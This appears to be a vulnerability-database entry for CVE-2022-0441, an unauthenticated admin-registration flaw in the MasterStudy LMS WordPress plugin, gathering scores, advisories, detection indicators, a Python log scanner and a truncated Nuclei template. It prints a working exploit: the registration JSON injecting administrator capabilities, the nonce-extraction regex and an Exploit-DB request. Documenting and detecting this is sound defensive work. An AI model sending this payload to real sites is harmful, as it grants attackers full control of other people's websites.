CVE-2022-0441
Published 2022-03-07
Priority: P189 · critical · CVSS 3.1: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 85.33% (99.7th percentile)
The MasterStudy LMS WordPress plugin before 2.7.6 does not validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| stylemixthemes | masterstudy_lms | < 2.7.6 | 2.7.6 |
Detection & IOCs
command: {"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
yara
regex: '"stm_lms_register":"([0-9a-z]+)"'
- Look for POST requests to /wp-admin/admin-ajax.php with action=stm_lms_register containing a JSON body with 'profile_default_fields_for_register' key including 'wp_capabilities' set to administrator:1 — this is the privilege escalation payload.
- Detect the specific JSON key path 'profile_default_fields_for_register.wp_capabilities.value.administrator' with value 1 in POST body to admin-ajax.php as the indicator of exploitation attempt.
- A successful exploitation response contains both 'Registration completed successfully' and '"status":"success"' in the HTTP response body with Content-Type application/json.
- The nonce value required for the attack is extracted from the page source via the pattern '"stm_lms_register":"([0-9a-z]+)"' — monitor for reconnaissance GET requests followed immediately by the malicious POST.
- The attack is unauthenticated; no session cookie or prior login is required. Any POST to admin-ajax.php?action=stm_lms_register from an unauthenticated source should be treated as suspicious.
- The nonce value in the exploit URL is dynamic and must be harvested from the target page before the attack POST; it is not a static IOC.
- Vulnerability only affects MasterStudy LMS plugin versions strictly before 2.7.6; version 2.7.6 and above are patched.
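One way to apply the request-side indicators above to logs that capture POST bodies (an added example, not code from any of the cited sources; the record layout, the sample data and the `classify_request`/`scan` names are assumptions). It goes slightly beyond the listed indicator by matching any meta key ending in `capabilities`, because WordPress prepends the site's table prefix to that key.

```python
import json
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/wp-admin/admin-ajax.php"
ACTION = "stm_lms_register"

def classify_request(method, url, body):
    """Return 'role-injection', 'registration' or None for one HTTP request."""
    parts = urlsplit(url)
    if method.upper() != "POST" or not parts.path.endswith(ENDPOINT):
        return None
    if ACTION not in parse_qs(parts.query).get("action", []):
        return None
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return "registration"  # unparsable body: still a call to the action
    fields = data.get("profile_default_fields_for_register") if isinstance(data, dict) else None
    if isinstance(fields, dict):
        for key in fields:
            # Roles live in the '<table prefix>capabilities' user-meta key,
            # so match the suffix rather than only 'wp_capabilities'.
            if str(key).lower().endswith("capabilities"):
                return "role-injection"
    return "registration"

# Constructed sample records (source IP, method, URL, body); not real traffic.
SAMPLE = [
    ("192.0.2.10", "POST", "/wp-admin/admin-ajax.php?action=stm_lms_register&nonce=abc123",
     '{"user_login":"alice","user_email":"alice@example.org",'
     '"profile_default_fields_for_register":{"first_name":{"value":"Alice"}}}'),
    ("198.51.100.7", "POST", "/wp-admin/admin-ajax.php?action=stm_lms_register&nonce=abc123",
     '{"user_login":"USERNAME","user_email":"EMAIL@TLD",'
     '"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}'),
    ("203.0.113.5", "POST", "/wp-admin/admin-ajax.php?action=heartbeat", "{}"),
    ("203.0.113.9", "POST", "/wp-admin/admin-ajax.php?action=stm_lms_register&nonce=abc123", "not json"),
]

def scan(records):
    """Return (source, verdict) for every record that hits the registration action."""
    hits = []
    for src, method, url, body in records:
        verdict = classify_request(method, url, body)
        if verdict:
            hits.append((src, verdict))
    return hits

if __name__ == "__main__":
    for src, verdict in scan(SAMPLE):
        print(src, verdict)
```

A `role-injection` hit on a site running a version before 2.7.6 warrants an audit of administrator accounts created at or after the request time.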
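CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | | 9.8 | CRITICAL | |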
GHSA
CVE-2022-0441 [CRITICAL] CWE-269 GHSA-ghw6-93qf-85hg
ghsa_unreviewed · 2022-03-08
The MasterStudy LMS WordPress plugin before 2.7.6 does not validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin.
VulnCheck
CVE-2022-0441 [CRITICAL] MasterStudy LMS WordPress New Account Authentication Bypass
vulncheck · 2022 · CVSS 9.8
The MasterStudy LMS WordPress plugin before 2.7.6 does not validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin.
Affected: stylemixthemes masterstudy_lms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/vulnerability/masterstudy-lms-learning-management-system/wordpress-masterstudy-lms-plugin-2-7-5-unauthenticated-admin-account-creation-vulnerability
Exploit PoC: https://vulncheck.com/xdb/610484d97e27; https://vulncheck.com/xdb/5c3bd7ca7d81; https://vulncheck.com/xdb/024c6c3af9ba
No detection rules found.
Exploit-DB
CVE-2022-0441 [CRITICAL] WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
exploitdb · 2022-02-18 · CVSS 9.8
---
# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0
Metasploit
Wordpress MasterStudy Admin Account Creation
metasploit
MasterStudy LMS, a WordPress plugin, prior to 2.7.6 is affected by a privilege escalation where an unauthenticated user is able to create an administrator account for WordPress itself.
Nuclei
CVE-2022-0441 [CRITICAL] MasterStudy LMS <2.7.6 - Improper Access Control
nuclei · CVSS 9.8
WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.
Template:
id: CVE-2022-0441
info:
  name: MasterStudy LMS <2.7.6 - Improper Access Control
  author: dwisiswant0,theamanrawat
  severity: critical
  description: |
    WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able